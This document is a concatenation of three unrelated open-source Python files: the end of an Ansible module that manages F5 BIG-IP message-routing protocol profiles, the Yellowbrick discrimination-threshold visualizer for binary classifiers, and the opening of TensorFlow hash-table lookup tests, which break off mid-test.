self.client.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def version_less_than_14(self):
version = tmos_version(self.client)
if LooseVersion(version) < LooseVersion('14.0.0'):
return True
return False
def exec_module(self):
if self.version_less_than_14():
raise F5ModuleError('Message routing is not supported on TMOS version below 14.x')
changed = False
result = dict()
state = self.want.state
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def absent(self):
if self.exists():
return self.remove()
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update(self):
self.have = self.read_current_from_device()
if not self.should_update():
return False
if self.module.check_mode:
return True
self.update_on_device()
return True
def remove(self):
if self.module.check_mode:
return True
self.remove_from_device()
if self.exists():
raise F5ModuleError("Failed to delete the resource.")
return True
def create(self):
self._set_changed_options()
if self.module.check_mode:
return True
self.create_on_device()
return True
def exists(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError:
return False
if resp.status == 404 or 'code' in response and response['code'] == 404:
return False
return True
def create_on_device(self):
params = self.changes.api_params()
params['name'] = self.want.name
params['partition'] = self.want.partition
uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/".format(
self.client.provider['server'],
self.client.provider['server_port'],
)
resp = self.client.api.post(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] in [400, 409]:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return True
def update_on_device(self):
params = self.changes.api_params()
uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.patch(uri, json=params)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
def remove_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
response = self.client.api.delete(uri)
if response.status == 200:
return True
raise F5ModuleError(response.content)
def read_current_from_device(self):
uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.name)
)
resp = self.client.api.get(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if 'code' in response and response['code'] == 400:
if 'message' in response:
raise F5ModuleError(response['message'])
else:
raise F5ModuleError(resp.content)
return ApiParameters(params=response)
class ArgumentSpec(object):
def __init__(self):
self.supports_check_mode = True
argument_spec = dict(
name=dict(required=True),
description=dict(),
parent=dict(),
disable_parser=dict(type='bool'),
max_egress_buffer=dict(type='int'),
max_msg_size=dict(type='int'),
msg_terminator=dict(),
no_response=dict(type='bool'),
partition=dict(
default='Common',
fallback=(env_fallback, ['F5_PARTITION'])
),
state=dict(
default='present',
choices=['present', 'absent']
)
)
self.argument_spec = {}
self.argument_spec.update(f5_argument_spec)
self.argument_spec.update(argument_spec)
def main():
spec = ArgumentSpec()
module = AnsibleModule(
argument_spec=spec.argument_spec,
supports_check_mode=spec.supports_check_mode,
)
try:
mm = ModuleManager(module=module)
results = mm.exec_module()
module.exit_json(**results)
except F5ModuleError as ex:
module.fail_json(msg=str(ex))
if __name__ == '__main__':
main()
| |
# yellowbrick.classifier.threshold
# DiscriminationThreshold visualizer for probabilistic classifiers.
#
# Author: Nathan Danielsen <ndanielsen@gmail.com>
# Author: Benjamin Bengfort <bbengfort@districtdatalabs.com>
# Created: Wed April 26 20:17:29 2017 -0700
#
# ID: threshold.py [] nathan.danielsen@gmail.com $
"""
DiscriminationThreshold visualizer for probabilistic classifiers.
"""
##########################################################################
## Imports
##########################################################################
import bisect
import numpy as np
from scipy.stats import mstats
from collections import defaultdict
from yellowbrick.base import ModelVisualizer
from yellowbrick.style.colors import resolve_colors
from yellowbrick.utils import is_classifier, is_probabilistic, is_monotonic
from yellowbrick.exceptions import YellowbrickTypeError, YellowbrickValueError
from sklearn.base import clone
from sklearn.model_selection import ShuffleSplit
from sklearn.metrics import precision_recall_curve
from sklearn.utils import indexable, safe_indexing
from sklearn.utils.multiclass import type_of_target
# Quantiles for lower bound, curve, and upper bound
QUANTILES_MEDIAN_80 = np.array([0.1, 0.5, 0.9])
# List of threshold metrics
METRICS = ["precision", "recall", "fscore", "queue_rate"]
##########################################################################
# Discrimination Thresholds Visualization
##########################################################################
class DiscriminationThreshold(ModelVisualizer):
"""
Visualizes how precision, recall, f1 score, and queue rate change as the
discrimination threshold increases. For probabilistic, binary classifiers,
the discrimination threshold is the probability at which you choose the
positive class over the negative. Generally this is set to 50%, but
adjusting the discrimination threshold will adjust sensitivity to false
positives which is described by the inverse relationship of precision and
recall with respect to the threshold.
The visualizer also accounts for variability in the model by running
multiple trials with different train and test splits of the data. The
variability is visualized using a band such that the curve is drawn as the
median score of each trial and the band is from the 10th to 90th
percentile.
The visualizer is intended to help users determine an appropriate
threshold for decision making (e.g. at what threshold do we have a human
review the data), given a tolerance for precision and recall or limiting
the number of records to check (the queue rate).
.. caution:: This method only works for binary, probabilistic classifiers.
Parameters
----------
model : Classification Estimator
A binary classification estimator that implements ``predict_proba`` or
``decision_function`` methods. Will raise ``TypeError`` if the model
cannot be used with the visualizer.
ax : matplotlib Axes, default: None
The axis to plot the figure on. If None is passed in the current axes
will be used (or generated if required).
n_trials : integer, default: 50
Number of times to shuffle and split the dataset to account for noise
in the threshold metrics curves. Note if cv provides > 1 splits,
the number of trials will be n_trials * cv.get_n_splits()
cv : float or cross-validation generator, default: 0.1
Determines the splitting strategy for each trial. Possible inputs are:
- float, to specify the percent of the test split
- object to be used as cross-validation generator
This attribute is meant to give flexibility with stratified splitting
but if a splitter is provided, it should only return one split and
have shuffle set to True.
fbeta : float, 1.0 by default
The strength of recall versus precision in the F-score.
argmax : str, default: 'fscore'
Annotate the threshold maximized by the supplied metric (see exclude
for the possible metrics to use). If None, will not annotate the
graph.
exclude : str or list, optional
Specify metrics to omit from the graph, can include:
- ``"precision"``
- ``"recall"``
- ``"queue_rate"``
- ``"fscore"``
All metrics not excluded will be displayed in the graph, nor will they
be available in ``thresholds_``; however, they will be computed on fit.
quantiles : sequence, default: np.array([0.1, 0.5, 0.9])
Specify the quantiles to view model variability across a number of
trials. Must be monotonic and have three elements such that the first
element is the lower bound, the second is the drawn curve, and the
third is the upper bound. By default the curve is drawn at the median,
and the bounds from the 10th percentile to the 90th percentile.
random_state : int, optional
Used to seed the random state for shuffling the data while composing
different train and test splits. If supplied, the random state is
incremented in a deterministic fashion for each split.
Note that if a splitter is provided, it's random state will also be
updated with this random state, even if it was previously set.
kwargs : dict
Keyword arguments that are passed to the base visualizer class.
Attributes
----------
thresholds_ : array
The uniform thresholds identified by each of the trial runs.
cv_scores_ : dict of arrays of ``len(thresholds_)``
The values for all included metrics including the upper and lower
bounds of the metrics defined by quantiles.
Notes
-----
The term "discrimination threshold" is rare in the literature. Here, we
use it to mean the probability at which the positive class is selected
over the negative class in binary classification.
Classification models must implement either a ``decision_function`` or
``predict_proba`` method in order to be used with this class. A
``YellowbrickTypeError`` is raised otherwise.
.. seealso::
For a thorough explanation of discrimination thresholds, see:
`Visualizing Machine Learning Thresholds to Make Better Business
Decisions
<http://blog.insightdatalabs.com/visualizing-classifier-thresholds/>`_
by Insight Data.
"""
def __init__(self, model, ax=None, n_trials=50, cv=0.1, fbeta=1.0,
argmax='fscore', exclude=None, quantiles=QUANTILES_MEDIAN_80,
random_state=None, **kwargs):
# Perform some quick type checking to help users avoid error.
if not is_classifier(model) or not is_probabilistic(model):
raise YellowbrickTypeError(
"{} requires a probabilistic binary classifier".format(
self.__class__.__name__
))
# Check the various inputs
self._check_quantiles(quantiles)
self._check_cv(cv)
self._check_exclude(exclude)
# Initialize the ModelVisualizer
super(DiscriminationThreshold, self).__init__(model, ax=ax, **kwargs)
# Set params
self.set_params(
n_trials=n_trials, cv=cv, fbeta=fbeta, argmax=argmax,
exclude=exclude, quantiles=quantiles, random_state=random_state,
)
def fit(self, X, y, **kwargs):
"""
Fit is the entry point for the visualizer. Given instances described
by X and binary classes described in the target y, fit performs n
trials by shuffling and splitting the dataset then computing the
precision, recall, f1, and queue rate scores for each trial. The
scores are aggregated by the quantiles expressed then drawn.
Parameters
----------
X : ndarray or DataFrame of shape n x m
A matrix of n instances with m features
y : ndarray or Series of length n
An array or series of target or class values. The target y must
be a binary classification target.
kwargs: dict
keyword arguments passed to Scikit-Learn API.
Returns
-------
self : instance
Returns the instance of the visualizer
raises: YellowbrickValueError
If the target y is not a binary classification target.
"""
# Check target before metrics raise crazy exceptions
if type_of_target(y) != 'binary':
raise YellowbrickValueError("multiclass format is not supported")
# Make arrays indexable for cross validation
X, y = indexable(X, y)
# TODO: parallelize trials with joblib (using sklearn utility)
# NOTE: parallelization with matplotlib is tricy at best!
trials = [
metric
for idx in range(self.n_trials)
for metric in self._split_fit_score_trial(X, y, idx)
]
# Compute maximum number of uniform thresholds across all trials
n_thresholds = np.array([len(t['thresholds']) for t in trials]).min()
self.thresholds_ = np.linspace(0.0, 1.0, num=n_thresholds)
# Filter metrics and collect values for uniform thresholds
metrics = frozenset(METRICS) - self._check_exclude(self.exclude)
uniform_metrics = defaultdict(list)
for trial in trials:
rows = defaultdict(list)
for t in self.thresholds_:
idx = bisect.bisect_left(trial['thresholds'], t)
for metric in metrics:
rows[metric].append(trial[metric][idx])
for metric, row in rows.items():
uniform_metrics[metric].append(row)
# Convert metrics to metric arrays
uniform_metrics = {
metric: np.array(values)
for metric, values in uniform_metrics.items()
}
# Perform aggregation and store cv_scores_
quantiles = self._check_quantiles(self.quantiles)
self.cv_scores_ = {}
for metric, values in uniform_metrics.items():
# Compute the lower, median, and upper plots
lower, median, upper = mstats.mquantiles(
values, prob=quantiles, axis=0
)
# Store the aggregates in cv scores
self.cv_scores_[metric] = median
self.cv_scores_["{}_lower".format(metric)] = lower
self.cv_scores_["{}_upper".format(metric)] = upper
# Draw and always return self
self.draw()
return self
def _split_fit_score_trial(self, X, y, idx=0):
"""
Splits the dataset, fits a clone of the estimator, then scores it
according to the required metrics.
The index of the split is added to the random_state if the
random_state is not None; this ensures that every split is shuffled
differently but in a deterministic fashion for testing purposes.
"""
random_state = self.random_state
if random_state is not None:
random_state += idx
splitter = self._check_cv(self.cv, random_state)
for train_index, test_index in splitter.split(X, y):
# Safe indexing handles multiple types of inputs including
# DataFrames and structured arrays - required for generic splits.
X_train = safe_indexing(X, train_index)
y_train = safe_indexing(y, train_index)
X_test = safe_indexing(X, test_index)
y_test = safe_indexing(y, test_index)
model = clone(self.estimator)
model.fit(X_train, y_train)
if hasattr(model, "predict_proba"):
# Get the probabilities for the positive class
y_scores = model.predict_proba(X_test)[:,1]
else:
# Use the decision function to get the scores
y_scores = model.decision_function(X_test)
# Compute the curve metrics and thresholds
curve_metrics = precision_recall_curve(y_test, y_scores)
precision, recall, thresholds = curve_metrics
# Compute the F1 score from precision and recall
# Don't need to warn for F, precision/recall would have warned
with np.errstate(divide='ignore', invalid='ignore'):
beta = self.fbeta ** 2
f_score = ((1 + beta) * precision * recall /
(beta * precision + recall))
# Ensure thresholds ends at 1
thresholds = np.append(thresholds, 1)
# Compute the queue rate
queue_rate = np.array([
(y_scores >= threshold).mean()
for threshold in thresholds
])
yield {
'thresholds': thresholds,
'precision': precision,
'recall': recall,
'fscore': f_score,
'queue_rate': queue_rate
}
def draw(self):
"""
Draws the cv scores as a line chart on the current axes.
"""
# Set the colors from the supplied values or reasonable defaults
color_values = resolve_colors(n_colors=4, colors=self.color)
for idx, metric in enumerate(METRICS):
# Skip any excluded labels
if metric not in self.cv_scores_:
continue
# Get the color ensuring every metric has a static color
color = color_values[idx]
# Make the label pretty
if metric == "fscore":
if self.fbeta == 1.0:
label = "$f_1$"
else:
label = "$f_{{\beta={:0.1f}}}".format(self.fbeta)
else:
label = metric.replace("_", " ")
# Draw the metric values
self.ax.plot(
self.thresholds_, self.cv_scores_[metric],
color=color, label=label
)
# Draw the upper and lower bounds
lower = self.cv_scores_["{}_lower".format(metric)]
upper = self.cv_scores_["{}_upper".format(metric)]
self.ax.fill_between(
self.thresholds_, upper, lower,
alpha=0.35, linewidth=0, color=color
)
# Annotate the graph with the maximizing value
if self.argmax.lower() == metric:
argmax = self.cv_scores_[metric].argmax()
threshold = self.thresholds_[argmax]
self.ax.axvline(
threshold, ls='--', c='k', lw=1,
label="$t_{}={:0.2f}$".format(metric[0], threshold)
)
return self.ax
def finalize(self, **kwargs):
"""
Finalize executes any subclass-specific axes finalization steps.
The user calls poof and poof calls finalize.
Parameters
----------
kwargs: generic keyword arguments.
"""
super(DiscriminationThreshold, self).finalize(**kwargs)
# Set the title of the threshold visualiztion
self.set_title("Threshold Plot for {}".format(self.name))
self.ax.legend(frameon=True, loc='best')
self.ax.set_xlabel('discrimination threshold')
self.ax.set_ylabel('score')
self.ax.set_xlim(0.0, 1.0)
self.ax.set_ylim(0.0, 1.0)
def _check_quantiles(self, val):
"""
Validate the quantiles passed in. Returns the np array if valid.
"""
if len(val) != 3 or not is_monotonic(val) or not np.all(val < 1):
raise YellowbrickValueError(
"quantiles must be a sequence of three "
"monotonically increasing values less than 1"
)
return np.asarray(val)
def _check_cv(self, val, random_state=None):
"""
Validate the cv method passed in. Returns the split strategy if no
validation exception is raised.
"""
# Use default splitter in this case
if val is None: val = 0.1
if isinstance(val, float) and val <= 1.0:
return ShuffleSplit(
n_splits=1, test_size=val, random_state=random_state
)
if hasattr(val, "split") and hasattr(val, "get_n_splits"):
if random_state is not None and hasattr(val, "random_state"):
val.random_state = random_state
return val
raise YellowbrickValueError(
"'{}' is not a valid cv splitter".format(type(val))
)
def _check_exclude(self, val):
"""
Validate the excluded metrics. Returns the set of excluded params.
"""
if val is None:
exclude = frozenset()
elif isinstance(val, str):
exclude = frozenset([val.lower()])
else:
exclude = frozenset(map(lambda s: s.lower(), val))
if len(exclude - frozenset(METRICS)) > 0:
raise YellowbrickValueError(
"'{}' is not a valid metric to exclude".format(repr(val))
)
return exclude
##########################################################################
# Quick Methods
##########################################################################
def discrimination_threshold(model, X, y, ax=None, n_trials=50, cv=0.1,
fbeta=1.0, argmax='fscore', exclude=None,
quantiles=QUANTILES_MEDIAN_80, random_state=None,
**kwargs):
"""Quick method for DiscriminationThreshold.
Visualizes how precision, recall, f1 score, and queue rate change as the
discrimination threshold increases. For probabilistic, binary classifiers,
the discrimination threshold is the probability at which you choose the
positive class over the negative. Generally this is set to 50%, but
adjusting the discrimination threshold will adjust sensitivity to false
positives which is described by the inverse relationship of precision and
recall with respect to the threshold.
.. seealso:: See DiscriminationThreshold for more details.
Parameters
----------
model : Classification Estimator
A binary classification estimator that implements ``predict_proba`` or
``decision_function`` methods. Will raise ``TypeError`` if the model
cannot be used with the visualizer.
X : ndarray or DataFrame of shape n x m
A matrix of n instances with m features
y : ndarray or Series of length n
An array or series of target or class values. The target y must
be a binary classification target.
ax : matplotlib Axes, default: None
The axis to plot the figure on. If None is passed in the current axes
will be used (or generated if required).
n_trials : integer, default: 50
Number of times to shuffle and split the dataset to account for noise
in the threshold metrics curves. Note if cv provides > 1 splits,
the number of trials will be n_trials * cv.get_n_splits()
cv : float or cross-validation generator, default: 0.1
Determines the splitting strategy for each trial. Possible inputs are:
- float, to specify the percent of the test split
- object to be used as cross-validation generator
This attribute is meant to give flexibility with stratified splitting
but if a splitter is provided, it should only return one split and
have shuffle set to True.
fbeta : float, 1.0 by default
The strength of recall versus precision in the F-score.
argmax : str, default: 'fscore'
Annotate the threshold maximized by the supplied metric (see exclude
for the possible metrics to use). If None, will not annotate the
graph.
exclude : str or list, optional
Specify metrics to omit from the graph, can include:
- ``"precision"``
- ``"recall"``
- ``"queue_rate"``
- ``"fscore"``
All metrics not excluded will be displayed in the graph, nor will they
be available in ``thresholds_``; however, they will be computed on fit.
quantiles : sequence, default: np.array([0.1, 0.5, 0.9])
Specify the quantiles to view model variability across a number of
trials. Must be monotonic and have three elements such that the first
element is the lower bound, the second is the drawn curve, and the
third is the upper bound. By default the curve is drawn at the median,
and the bounds from the 10th percentile to the 90th percentile.
random_state : int, optional
Used to seed the random state for shuffling the data while composing
different train and test splits. If supplied, the random state is
incremented in a deterministic fashion for each split.
Note that if a splitter is provided, it's random state will also be
updated with this random state, even if it was previously set.
kwargs : dict
Keyword arguments that are passed to the base visualizer class.
Returns
-------
ax : matplotlib axes
Returns the axes that the parallel coordinates were drawn on.
"""
# Instantiate the visualizer
visualizer = DiscriminationThreshold(
model, ax=ax, n_trials=n_trials, cv=cv, fbeta=fbeta, argmax=argmax,
exclude=exclude, quantiles=quantiles, random_state=random_state,
**kwargs
)
# Fit and transform the visualizer (calls draw)
visualizer.fit(X, y)
visualizer.poof()
# Return the axes object on the visualizer
return visualizer.ax
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lookup ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.platform import test
from tensorflow.python.training import server_lib
class HashTableOpTest(test.TestCase):
def testHashTable(self):
with self.test_session():
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
table.init.run()
self.assertAllEqual(3, table.size().eval())
input_string = constant_op.constant(["brain", "salad", "tank"])
output = table.lookup(input_string)
self.assertAllEqual([3], output.get_shape())
result = output.eval()
self.assertAllEqual([0, 1, -1], result)
def testHashTableFindHighRank(self):
with self.test_session():
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
table.init.run()
self.assertAllEqual(3, table.size().eval())
input_string = constant_op.constant(
[["brain", "salad"], ["tank", "tarkus"]])
output = table.lookup(input_string)
result = output.eval()
self.assertAllEqual([[0, 1], [-1, -1]], result)
def testHashTableInitWithPythonArrays(self):
with self.test_session():
default_val = -1
keys = ["brain", "salad", "surgery"]
values = [0, 1, 2]
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(
keys, values, value_dtype=dtypes.int64), default_val)
table.init.run()
self.assertAllEqual(3, table.size().eval())
input_string = constant_op.constant(["brain", "salad", "tank"])
output = table.lookup(input_string)
result = output.eval()
self.assertAllEqual([0, 1, -1], result)
def testHashTableInitWithNumPyArrays(self):
with self.test_session():
default_val = -1
keys = np.array(["brain", "salad", "surgery"], dtype=np.str)
values = np.array([0, 1, 2], dtype=np.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
table.init.run()
self.assertAllEqual(3, table.size().eval())
input_string = constant_op.constant(["brain", "salad", "tank"])
output = table.lookup(input_string)
result = output.eval()
self.assertAllEqual([0, 1, -1], result)
def testMultipleHashTables(self):
with self.test_session() as sess:
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table1 = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
table2 = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
table3 = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
lookup_ops.tables_initializer().run()
self.assertAllEqual(3, table1.size().eval())
self.assertAllEqual(3, table2.size().eval())
self.assertAllEqual(3, table3.size().eval())
input_string = constant_op.constant(["brain", "salad", "tank"])
output1 = table1.lookup(input_string)
output2 = table2.lookup(input_string)
output3 = table3.lookup(input_string)
out1, out2, out3 = sess.run([output1, output2, output3])
self.assertAllEqual([0, 1, -1], out1)
self.assertAllEqual([0, 1, -1], out2)
self.assertAllEqual([0, 1, -1], out3)
def testHashTableWithTensorDefault(self):
with self.test_session():
default_val = constant_op.constant(-1, dtypes.int64)
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
table.init.run()
input_string = constant_op.constant(["brain", "salad", "tank"])
output = table.lookup(input_string)
result = output.eval()
self.assertAllEqual([0, 1, -1], result)
def testHashTableWithSparseTensorInput(self):
with self.test_session() as sess:
default_val = constant_op.constant(-1, dtypes.int64)
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
table.init.run()
sp_indices = [[0, 0], [0, 1], [1, 0]]
sp_shape = [2, 2]
input_tensor = sparse_tensor.SparseTensor(
constant_op.constant(sp_indices, dtypes.int64),
constant_op.constant(["brain", "salad", "tank"]),
constant_op.constant(sp_shape, dtypes.int64))
output = table.lookup(input_tensor)
out_indices, out_values, out_shape = sess.run(output)
self.assertAllEqual([0, 1, -1], out_values)
self.assertAllEqual(sp_indices, out_indices)
self.assertAllEqual(sp_shape, out_shape)
def testSignatureMismatch(self):
with self.test_session():
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
table.init.run()
input_string = constant_op.constant([1, 2, 3], dtypes.int64)
with self.assertRaises(TypeError):
table.lookup(input_string)
with self.assertRaises(TypeError):
lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), "UNK")
def testDTypes(self):
with self.test_session():
default_val = -1
with self.assertRaises(TypeError):
lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(["a"], [1], [dtypes.string],
dtypes.int64), default_val)
def testNotInitialized(self):
with self.test_session():
default_val = -1
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(
["a"], [1], value_dtype=dtypes.int64), default_val)
input_string = constant_op.constant(["brain", "salad", "surgery"])
output = table.lookup(input_string)
with self.assertRaisesOpError("Table not initialized"):
output.eval()
def testInitializeTwice(self):
with self.test_session():
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
table.init.run()
with self.assertRaisesOpError("Table already initialized"):
table.init.run()
def testInitializationWithInvalidDimensions(self):
with self.test_session():
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2, 3, 4], dtypes.int64)
with self.assertRaises(ValueError):
lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
def testMultipleSessions(self):
# Start a server
server = server_lib.Server(
{
"local0": ["localhost:0"]
}, protocol="grpc", start=True)
# Create two sessions sharing the same state
session1 = session.Session(server.target)
session2 = session.Session(server.target)
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values),
default_val,
name="t1")
# Init the table in the first session.
with session1:
table.init.run()
self.assertAllEqual(3, table.size().eval())
# Init the table in the second session and verify that we do not get a
# "Table already initialized" error.
with session2:
table.init.run()
self.assertAllEqual(3, table.size().eval())
class IndexTableFromFile(test.TestCase):
def _createVocabFile(self, basename, values=("brain", "salad", "surgery")):
vocabulary_file = os.path.join(self.get_temp_dir(), basename)
with open(vocabulary_file, "w") as f:
f.write("\n".join(values) + "\n")
return vocabulary_file
def test_string_index_table_from_file(self):
vocabulary_file = self._createVocabFile("f2i_vocab1.txt")
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file, num_oov_buckets=1)
ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, 3), ids.eval())
def test_string_index_table_from_multicolumn_file(self):
vocabulary_file = self._createVocabFile(
"f2i_vocab1.txt", values=("brain\t300", "salad\t20", "surgery\t1"))
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file,
num_oov_buckets=1,
key_column_index=0,
value_column_index=lookup_ops.TextFileIndex.LINE_NUMBER)
ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, 3), ids.eval())
def test_string_index_table_from_multicolumn_file_custom_delimiter(self):
vocabulary_file = self._createVocabFile(
"f2i_vocab1.txt", values=("brain 300", "salad 20", "surgery 1"))
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file,
num_oov_buckets=1,
key_column_index=0,
value_column_index=lookup_ops.TextFileIndex.LINE_NUMBER,
delimiter=" ")
ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, 3), ids.eval())
def test_string_index_table_from_file_tensor_filename(self):
vocabulary_file = self._createVocabFile("f2i_vocab1.txt")
with self.test_session():
vocabulary_file = constant_op.constant(vocabulary_file)
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file, num_oov_buckets=1)
ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, 3), ids.eval())
self.assertEqual(1,
len(ops.get_collection(ops.GraphKeys.ASSET_FILEPATHS)))
def test_string_index_table_from_file_placeholder_filename(self):
vocabulary_file = self._createVocabFile("f2i_vocab1.txt")
with self.test_session():
vocabulary_placeholder = array_ops.placeholder(dtypes.string, [])
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_placeholder, num_oov_buckets=1)
ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))
self.assertRaises(errors_impl.OpError, ids.eval)
feed_dict = {vocabulary_placeholder.name: vocabulary_file}
lookup_ops.tables_initializer().run(feed_dict=feed_dict)
self.assertAllEqual((1, 2, 3), ids.eval())
self.assertEqual(0,
len(ops.get_collection(ops.GraphKeys.ASSET_FILEPATHS)))
def test_int32_index_table_from_file(self):
vocabulary_file = self._createVocabFile(
"f2i_vocab2.txt", values=("42", "1", "-1000"))
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file,
num_oov_buckets=1,
key_dtype=dtypes.int32)
ids = table.lookup(
constant_op.constant((1, -1000, 11), dtype=dtypes.int32))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, 3), ids.eval())
def test_int64_index_table_from_file(self):
vocabulary_file = self._createVocabFile(
"f2i_vocab3.txt", values=("42", "1", "-1000"))
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file,
num_oov_buckets=1,
key_dtype=dtypes.int64)
ids = table.lookup(
constant_op.constant((1, -1000, 11), dtype=dtypes.int64))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, 3), ids.eval())
def test_index_table_from_file_with_default_value(self):
default_value = -42
vocabulary_file = self._createVocabFile("f2i_vocab4.txt")
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file, default_value=default_value)
ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual((1, 2, default_value), ids.eval())
def test_index_table_from_file_with_oov_buckets(self):
vocabulary_file = self._createVocabFile("f2i_vocab5.txt")
with self.test_session():
table = lookup_ops.index_table_from_file(
vocabulary_file=vocabulary_file, num_oov_buckets=1000)
ids = table.lookup(
constant_op.constant(["salad", "surgery", "tarkus", "toccata"]))
self.assertRaises(errors_impl.OpError, ids.eval)
lookup_ops.tables_initializer().run()
self.assertAllEqual(
(
1, # From vocabulary file.
2, # From vocabulary file.
867, # 3 + fingerprint("tarkus") mod 300.
860), # 3 + fingerprint("toccata") mod 300.
ids.eval())
def test_index_table_from_file_fails_with_empty_vocabulary_file_name(self):
self.assertRaises(
ValueError, lookup_ops.index_table_from_file, vocabulary_file="")
def test_index_table_from_file_fails_with_empty_vocabulary(self):
